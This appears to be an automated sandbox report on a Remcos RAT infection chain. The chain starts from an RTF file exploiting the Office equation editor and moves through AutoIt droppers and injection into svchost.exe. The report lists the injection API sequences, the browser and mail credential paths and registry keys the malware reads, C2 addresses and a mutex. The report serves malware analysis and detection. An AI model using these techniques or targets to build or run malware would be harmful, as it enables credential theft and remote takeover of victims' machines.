Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D6C104 LoadLibraryA,GetProcAddress, 5_2_00D6C104
Contains functionality to read the PEB
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00683FF2 mov edx, dword ptr fs:[00000030h] 2_2_00683FF2
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_005E34B0 mov eax, dword ptr fs:[00000030h] 6_2_005E34B0
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_005E3510 mov eax, dword ptr fs:[00000030h] 6_2_005E3510
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_005E1E70 mov eax, dword ptr fs:[00000030h] 6_2_005E1E70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00443355 mov eax, dword ptr fs:[00000030h] 7_2_00443355
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_10004AB4 mov eax, dword ptr fs:[00000030h] 7_2_10004AB4
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D481D4 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 5_2_00D481D4
Enables debug privileges
Source: C:\Windows\SysWOW64\svchost.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D1A2D5 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_00D1A2D5
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D1A2A4 SetUnhandledExceptionFilter, 5_2_00D1A2A4
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013BA2A4 SetUnhandledExceptionFilter, 6_2_013BA2A4
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_013BA2D5 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_013BA2D5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00434BD8 SetUnhandledExceptionFilter, 7_2_00434BD8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_0043503C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_00434A8A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_0043BB71
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_100060E2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_10002B1C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_10002639

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\svchost.exe Domain query: geoplugin.net
Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 107.173.4.16 2404 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 178.237.33.50 80 Jump to behavior
Contains functionality to inject code into remote processes
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError, 7_2_0041812A
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\directory\name.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 7EFDE008 Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 7EFDE008 Jump to behavior
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Source: C:\Windows\SysWOW64\svchost.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 7_2_00412132
Contains functionality to execute programs as a different user
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D48A73 LogonUserW, 5_2_00D48A73
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00CF3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 5_2_00CF3B4C
Contains functionality to simulate keystroke presses
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00CF4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 5_2_00CF4A35
Contains functionality to simulate mouse events
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D54CCE mouse_event, 5_2_00D54CCE
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\taskhostw.exe "C:\Users\user\AppData\Roaming\taskhostw.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Roaming\taskhostw.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\taskhostw.exe" Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\siqmroydgnmmmfpuczimwafbeumewarjhx" Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\ckvxrh" Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\feapszuyi" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D481D4 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 5_2_00D481D4
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D54A08 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 5_2_00D54A08
Source: taskhostw.exe, 00000005.00000000.358584246.0000000000DA4000.00000002.00000001.01000000.00000005.sdmp, taskhostw.exe, 00000005.00000003.362011694.0000000002B33000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000000.362092818.0000000001444000.00000002.00000001.01000000.00000006.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: taskhostw.exe, name.exe Binary or memory string: Shell_TrayWnd
Source: svchost.exe, 00000007.00000002.854766910.0000000000234000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_3_02AA7BAB cpuid 5_3_02AA7BAB
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\svchost.exe Code function: EnumSystemLocalesW, 7_2_0045201B
Source: C:\Windows\SysWOW64\svchost.exe Code function: EnumSystemLocalesW, 7_2_004520B6
Source: C:\Windows\SysWOW64\svchost.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 7_2_00452143
Source: C:\Windows\SysWOW64\svchost.exe Code function: GetLocaleInfoW, 7_2_00452393
Source: C:\Windows\SysWOW64\svchost.exe Code function: EnumSystemLocalesW, 7_2_00448484
Source: C:\Windows\SysWOW64\svchost.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 7_2_004524BC
Source: C:\Windows\SysWOW64\svchost.exe Code function: GetLocaleInfoW, 7_2_004525C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 7_2_00452690
Source: C:\Windows\SysWOW64\svchost.exe Code function: GetLocaleInfoW, 7_2_0044896D
Source: C:\Windows\SysWOW64\svchost.exe Code function: GetLocaleInfoA, 7_2_0040F90C
Source: C:\Windows\SysWOW64\svchost.exe Code function: IsValidCodePage,GetLocaleInfoW, 7_2_00451D58
Source: C:\Windows\SysWOW64\svchost.exe Code function: EnumSystemLocalesW, 7_2_00451FD0
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D25007 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 5_2_00D25007
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D3215F GetUserNameW, 5_2_00D3215F
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D240BA __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 5_2_00D240BA
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00CF4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 5_2_00CF4AFE
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Remcos RAT
Source: Yara match File source: 14.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.name.exe.d70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.name.exe.d70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.name.exe.28e0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.name.exe.28e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.394502954.0000000000794000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.854766910.0000000000234000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: name.exe PID: 3580, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 3592, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: name.exe PID: 3856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 3892, type: MEMORYSTR
Contains functionality to steal Chrome passwords or cookies
Source: C:\Windows\SysWOW64\svchost.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 7_2_0040BA4D
Contains functionality to steal Firefox passwords or cookies
Source: C:\Windows\SysWOW64\svchost.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 7_2_0040BB6B
Source: C:\Windows\SysWOW64\svchost.exe Code function: \key3.db 7_2_0040BB6B
Searches for Windows Mail specific files
Source: C:\Windows\SysWOW64\svchost.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail * Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup * Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new * Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db Jump to behavior
Tries to steal Instant Messenger accounts or passwords
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail Jump to behavior
Yara detected WebBrowserPassView password recovery tool
Source: Yara match File source: Process Memory Space: svchost.exe PID: 3592, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 3704, type: MEMORYSTR
OS version to string mapping found (often used in BOTs)
Source: name.exe Binary or memory string: WIN_81
Source: name.exe Binary or memory string: WIN_XP
Source: name.exe Binary or memory string: WIN_XPe
Source: name.exe Binary or memory string: WIN_VISTA
Source: name.exe Binary or memory string: WIN_7
Source: name.exe Binary or memory string: WIN_8
Source: taskhostw[1].exe.2.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality
barindex
Detected Remcos RAT
Source: C:\Windows\SysWOW64\svchost.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-FI789R Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-FI789R Jump to behavior
Yara detected Remcos RAT
Source: Yara match File source: 14.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.name.exe.d70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.name.exe.d70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.name.exe.28e0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.name.exe.28e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.394502954.0000000000794000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.854766910.0000000000234000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: name.exe PID: 3580, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 3592, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: name.exe PID: 3856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 3892, type: MEMORYSTR
Contains functionality to launch a control a shell (cmd.exe)
Source: C:\Windows\SysWOW64\svchost.exe Code function: cmd.exe 7_2_0040569A
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D66399 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 5_2_00D66399
Source: C:\Users\user\AppData\Roaming\taskhostw.exe Code function: 5_2_00D6685D socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 5_2_00D6685D
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_01406399 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 6_2_01406399
Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_0140685D socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 6_2_0140685D
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1532435 Sample: WC5Gv13cOQ.rtf Startdate: 13/10/2024 Architecture: WINDOWS Score: 100 71 Suricata IDS alerts for network traffic 2->71 73 Found malware configuration 2->73 75 Malicious sample detected (through community Yara rule) 2->75 77 21 other signatures 2->77 10 WINWORD.EXE 291 13 2->10         started        12 wscript.exe 1 2->12         started        process3 signatures4 15 EQNEDT32.EXE 12 10->15         started        20 EQNEDT32.EXE 10->20         started        103 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->103 22 name.exe 2 12->22         started        process5 dnsIp6 59 104.168.7.25, 49161, 80 AS-COLOCROSSINGUS United States 15->59 45 C:\Users\user\AppData\Roaming\taskhostw.exe, PE32 15->45 dropped 47 C:\Users\user\AppData\...\taskhostw[1].exe, PE32 15->47 dropped 61 Office equation editor establishes network connection 15->61 63 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 15->63 24 taskhostw.exe 6 15->24         started        65 Binary is likely a compiled AutoIt script file 22->65 67 Writes to foreign memory regions 22->67 69 Maps a DLL or memory area into another process 22->69 28 svchost.exe 22->28         started        file7 signatures8 process9 file10 49 C:\Users\user\AppData\Local\...\name.exe, PE32 24->49 dropped 95 Multi AV Scanner detection for dropped file 24->95 97 Binary is likely a compiled AutoIt script file 24->97 99 Machine Learning detection for dropped file 24->99 30 name.exe 3 24->30         started        101 Detected Remcos RAT 28->101 signatures11 process12 file13 51 C:\Users\user\AppData\Roaming\...\name.vbs, data 30->51 dropped 105 Multi AV Scanner detection for dropped file 30->105 107 Binary is likely a compiled AutoIt script file 30->107 109 Machine Learning detection for dropped file 30->109 111 4 other signatures 30->111 34 svchost.exe 3 10 30->34         started        signatures14 process15 dnsIp16 53 geoplugin.net 34->53 55 geoplugin.net 178.237.33.50, 49163, 80 ATOM86-ASATOM86NL Netherlands 34->55 57 